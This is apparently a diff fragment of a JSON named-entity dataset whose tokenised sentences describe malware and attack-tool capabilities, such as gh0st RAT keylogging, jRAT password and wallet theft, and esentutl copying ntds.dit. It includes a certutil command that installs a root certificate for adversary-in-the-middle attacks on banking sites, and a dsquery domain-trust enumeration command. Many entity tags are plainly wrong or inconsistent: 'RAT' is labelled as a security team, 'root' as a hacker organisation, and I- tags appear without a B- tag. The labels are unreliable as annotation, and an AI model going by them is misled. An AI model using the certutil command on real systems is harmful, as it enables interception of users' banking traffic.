"O", + "O" + ] + }, + { + "tokens": [ + "ccf32", + "has", + "created", + "a", + "hidden", + "directory", + "on", + "targeted", + "systems,", + "naming", + "it", + "after", + "the", + "current", + "local", + "time", + "(year,", + "month,", + "and", + "day)." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ccf32", + "can", + "temporarily", + "store", + "files", + "in", + "a", + "hidden", + "directory", + "on", + "the", + "local", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ccf32", + "has", + "copied", + "files", + "to", + "a", + "remote", + "machine", + "infected", + "with", + "Chinoxy", + "or", + "another", + "backdoor." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ccf32", + "can", + "run", + "on", + "a", + "daily", + "basis", + "using", + "a", + "scheduled", + "task." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ccf32", + "can", + "determine", + "the", + "local", + "time", + "on", + "targeted", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ccf32", + "has", + "used", + "`cmd.exe`", + "for", + "archiving", + "data", + "and", + "deleting", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "certutil", + "may", + "be", + "used", + "to", + "Base64", + "encode", + "collected", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "certutil", + "has", + "been", + "used", + "to", + "decode", + "binaries", + "hidden", + "inside", + "certificate", + "files", + "as", + "Base64", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "certutil", + "can", + "be", + "used", + "to", + "download", + "files", + "from", + "a", + "given", + "URL." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "certutil", + "can", + "be", + "used", + "to", + "install", + "browser", + "root", + "certificates", + "as", + "a", + "precursor", + "to", + "performing", + "Adversary-in-the-Middle", + "between", + "connections", + "to", + "banking", + "websites.", + "Example", + "command:", + "<code>certutil", + "-addstore", + "-f", + "-user", + "ROOT", + "ProgramData\\cert512121.der</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd", + "can", + "be", + "used", + "to", + "delete", + "files", + "from", + "the", + "file", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd", + "can", + "be", + "used", + "to", + "find", + "files", + "and", + "directories", + "with", + "native", + "functionality", + "such", + "as", + "<code>dir</code>", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "cmd", + "can", + "be", + "used", + "to", + "copy", + "files", + "to/from", + "a", + "remotely", + "connected", + "external", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd", + "can", + "be", + "used", + "to", + "copy", + "files", + "to/from", + "a", + "remotely", + "connected", + "internal", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd", + "can", + "be", + "used", + "to", + "find", + "information", + "about", + "the", + "operating", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd", + "is", + "used", + "to", + "execute", + "programs", + "and", + "other", + "actions", + "at", + "the", + "command-line", + "interface." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "down_new", + "has", + "the", + "ability", + "to", + "list", + "the", + "directories", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "down_new", + "has", + "the", + "ability", + "to", + "download", + "files", + "to", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "down_new", + "has", + "the", + "ability", + "to", + "list", + "running", + "processes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "down_new", + "has", + "the", + "ability", + "to", + "detect", + "anti-virus", + "products", + "and", + "processes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "down_new", + "has", + "the", + "ability", + "to", + "gather", + "information", + "on", + "installed", + "applications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "down_new", + "has", + "the", + "ability", + "to", + "base64", + "encode", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "down_new", + "has", + "the", + "ability", + "to", + "AES", + "encrypt", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "down_new", + "has", + "the", + "ability", + "to", + "identify", + "the", + "system", + "volume", + "information", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "down_new", + "has", + "the", + "ability", + "to", + "identify", + "the", + "MAC", + "address", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "down_new", + "has", + "the", + "ability", + "to", + "use", + "HTTP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "dsquery", + "can", + "be", + "used", + "to", + "gather", + "information", + "on", + "user", + "accounts", + "within", + "a", + "domain." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "dsquery", + "can", + "be", + "used", + "to", + "gather", + "information", + "on", + "permission", + "groups", + "within", + "a", + "domain." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "dsquery", + "can", + "be", + "used", + "to", + "gather", + "information", + "on", + "domain", + "trusts", + "with", + "<code>dsquery", + "*", + "-filter", + "\"(objectClass=trustedDomain)\"", + "-attr", + "*</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "dsquery", + "has", + "the", + "ability", + "to", + "enumerate", + "various", + "information,", + "such", + "as", + "the", + "operating", + "system", + "and", + "host", + "name,", + "for", + "systems", + "within", + "a", + "domain." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "esentutl", + "can", + "be", + "used", + "to", + "collect", + "data", + "from", + "local", + "file", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "esentutl", + "can", + "use", + "the", + "Volume", + "Shadow", + "Copy", + "service", + "to", + "copy", + "locked", + "files", + "such", + "as", + "`ntds.dit`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "esentutl", + "can", + "be", + "used", + "to", + "copy", + "files", + "from", + "a", + "given", + "URL." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "esentutl", + "can", + "be", + "used", + "to", + "copy", + "files", + "to/from", + "a", + "remote", + "share." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "esentutl", + "can", + "copy", + "`ntds.dit`", + "using", + "the", + "Volume", + "Shadow", + "Copy", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "esentutl", + "can", + "be", + "used", + "to", + "read", + "and", + "write", + "alternate", + "data", + "streams." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "ftp", + "may", + "be", + "used", + "to", + "exfiltrate", + "data", + "separate", + "from", + "the", + "main", + "command", + "and", + "control", + "protocol." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ftp", + "may", + "be", + "abused", + "by", + "adversaries", + "to", + "transfer", + "tools", + "or", + "files", + "from", + "an", + "external", + "system", + "into", + "a", + "compromised", + "environment." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ftp", + "may", + "be", + "abused", + "by", + "adversaries", + "to", + "transfer", + "tools", + "or", + "files", + "between", + "systems", + "within", + "a", + "compromised", + "environment." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "is", + "able", + "to", + "wipe", + "event", + "logs." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "is", + "able", + "to", + "open", + "a", + "remote", + "shell", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "gh0st", + "RAT", + "variant", + "has", + "used", + "DLL", + "side-loading." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "B-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "has", + "decrypted", + "and", + "loaded", + "the", + "gh0st", + "RAT", + "DLL", + "into", + "memory,", + "once", + "the", + "initial", + "dropper", + "executable", + "is", + "launched." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "has", + "encrypted", + "TCP", + "communications", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "operators", + "have", + "used", + "dynamic", + "DNS", + "to", + "mask", + "the", + "true", + "location", + "of", + "their", + "C2", + "behind", + "rapidly", + "changing", + "IP", + "addresses." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "has", + "the", + "capability", + "to", + "to", + "delete", + "files." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "can", + "download", + "files", + "to", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "has", + "a", + "keylogger." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "has", + "altered", + "the", + "InstallTime", + "subkey." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "has", + "used", + "the", + "`InterlockedExchange`,", + "`SeShutdownPrivilege`,", + "and", + "`ExitWindowsEx`", + "Windows", + "API", + "functions." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "has", + "used", + "an", + "encrypted", + "protocol", + "within", + "TCP", + "segments", + "to", + "communicate", + "with", + "the", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "has", + "the", + "capability", + "to", + "list", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "can", + "inject", + "malicious", + "code", + "into", + "process", + "created", + "by", + "the", + "“Command_Create&Inject”", + "function." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "has", + "checked", + "for", + "the", + "existence", + "of", + "a", + "Service", + "key", + "to", + "determine", + "if", + "it", + "has", + "already", + "been", + "installed", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "has", + "added", + "a", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "gh0st", + "RAT", + "variant", + "has", + "used", + "rundll32", + "for", + "execution." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "can", + "capture", + "the", + "victim’s", + "screen", + "remotely." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "can", + "execute", + "its", + "service", + "if", + "the", + "Service", + "key", + "exists.", + "If", + "the", + "key", + "does", + "not", + "exist,", + "gh0st", + "RAT", + "will", + "create", + "and", + "run", + "the", + "service." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "can", + "load", + "DLLs", + "into", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "has", + "used", + "Zlib", + "to", + "compress", + "C2", + "communications", + "data", + "before", + "encrypting", + "it." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "uses", + "RC4", + "and", + "XOR", + "to", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "has", + "gathered", + "system", + "architecture,", + "processor,", + "OS", + "configuration,", + "and", + "installed", + "hardware", + "information." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gh0st", + "RAT", + "can", + "create", + "a", + "new", + "service", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gsecdump", + "can", + "dump", + "LSA", + "secrets." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gsecdump", + "can", + "dump", + "Windows", + "password", + "hashes", + "from", + "the", + "SAM." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "hcdLoader", + "provides", + "command-line", + "access", + "to", + "the", + "compromised", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "hcdLoader", + "installs", + "itself", + "as", + "a", + "service", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "httpclient", + "encrypts", + "C2", + "content", + "with", + "XOR", + "using", + "a", + "single", + "byte,", + "0x12." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "httpclient", + "uses", + "HTTP", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "httpclient", + "opens", + "cmd.exe", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "iKitten", + "will", + "zip", + "up", + "the", + "/Library/Keychains", + "directory", + "before", + "exfiltrating", + "it." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "iKitten", + "prompts", + "the", + "user", + "for", + "their", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "iKitten", + "saves", + "itself", + "with", + "a", + "leading", + "\".\"", + "so", + "that", + "it's", + "hidden", + "from", + "users", + "by", + "default." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "iKitten", + "collects", + "the", + "keychains", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "iKitten", + "lists", + "the", + "current", + "processes", + "running." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "iKitten", + "adds", + "an", + "entry", + "to", + "the", + "rc.common", + "file", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "iKitten", + "will", + "look", + "for", + "the", + "current", + "IP", + "address." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ifconfig", + "can", + "be", + "used", + "to", + "display", + "adapter", + "configuration", + "on", + "Unix", + "systems,", + "including", + "information", + "for", + "TCP/IP,", + "DNS,", + "and", + "DHCP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ipconfig", + "can", + "be", + "used", + "to", + "display", + "adapter", + "configuration", + "on", + "Windows", + "systems,", + "including", + "information", + "for", + "TCP/IP,", + "DNS,", + "and", + "DHCP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "capture", + "microphone", + "recordings." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "capture", + "clipboard", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "capture", + "passwords", + "from", + "common", + "chat", + "applications", + "such", + "as", + "MSN", + "Messenger,", + "AOL,", + "Instant", + "Messenger,", + "and", + "and", + "Google", + "Talk." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "B-Way", + "B-Tool", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "capture", + "passwords", + "from", + "common", + "web", + "browsers", + "such", + "as", + "Internet", + "Explorer,", + "Google", + "Chrome,", + "and", + "Firefox." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "I-Tool", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "jRAT", + "has", + "a", + "function", + "to", + "delete", + "files", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "browse", + "file", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "download", + "and", + "execute", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "has", + "been", + "distributed", + "as", + "HTA", + "files", + "with", + "JScript." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "jRAT", + "has", + "the", + "capability", + "to", + "log", + "keystrokes", + "from", + "the", + "victim’s", + "machine,", + "both", + "offline", + "and", + "online." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT’s", + "Java", + "payload", + "is", + "encrypted", + "with", + "AES.", + "Additionally,", + "backdoor", + "files", + "are", + "encrypted", + "using", + "DES", + "as", + "a", + "stream", + "cipher.", + "Later", + "variants", + "of", + "jRAT", + "also", + "incorporated", + "AV", + "evasion", + "methods", + "such", + "as", + "Java", + "bytecode", + "obfuscation", + "via", + "the", + "commercial", + "Allatori", + "obfuscation", + "tool." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "map", + "UPnP", + "ports." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "steal", + "keys", + "for", + "VPNs", + "and", + "cryptocurrency", + "wallets." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "query", + "and", + "kill", + "system", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "serve", + "as", + "a", + "SOCKS", + "proxy", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "support", + "RDP", + "control." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "be", + "configured", + "to", + "reconnect", + "at", + "certain", + "intervals." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "has", + "the", + "capability", + "to", + "take", + "screenshots", + "of", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "list", + "security", + "software,", + "such", + "as", + "by", + "using", + "WMIC", + "to", + "identify", + "anti-virus", + "products", + "installed", + "on", + "the", + "victim’s", + "machine", + "and", + "to", + "obtain", + "firewall", + "details." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "payloads", + "have", + "been", + "packed." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "list", + "and", + "manage", + "startup", + "entries." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "collects", + "information", + "about", + "the", + "OS", + "(version,", + "build", + "type,", + "install", + "date)", + "as", + "well", + "as", + "system", + "up-time", + "upon", + "receiving", + "a", + "connection", + "from", + "a", + "backdoor." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "gather", + "victim", + "internal", + "and", + "external", + "IPs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + 